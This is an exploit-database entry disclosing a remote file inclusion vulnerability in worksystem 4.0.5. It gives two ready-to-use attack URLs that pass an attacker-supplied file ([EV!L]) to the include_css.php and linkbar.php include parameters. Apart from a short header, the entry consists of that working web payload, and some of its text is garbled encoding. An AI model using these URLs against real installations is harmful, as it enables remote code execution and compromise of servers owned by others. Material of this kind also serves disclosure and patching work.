worksystem 4.0.5 RFI Vulnerability

2009-12-26T00:00:00
ID 1337DAY-ID-10443
Type zdt
Reporter indoushka
Modified 2009-12-26T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================
worksystem 4.0.5 RFI Vulnerability
==================================

========================================================================================
| # Title    : worksystem 4.0.5 RFI Vulnerability                                      |
| # Author   : indoushka                                                               |
| # CVE-ID   : ()                                                                      |
| # OSVDB-ID : ()                                                                      |
| # Script   : worksystem 4.0.5                                                        |
| # Tested on: windows SP2 Fran煙ais V.(Pnx2 2.0) + Lunix Fran煙ais v.(9.4 Ubuntu)       |
| # Bug      : RFI                                                                     |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1- http://localhost/worksystem_4_0_5/include/include_css.php?g?_include=[EV!L]
| 2- http://localhost/worksystem_4_0_5/smallaxe-0.3.1/inc/linkbar.php?cfile=[EV!L]



#  0day.today [2018-01-08]  #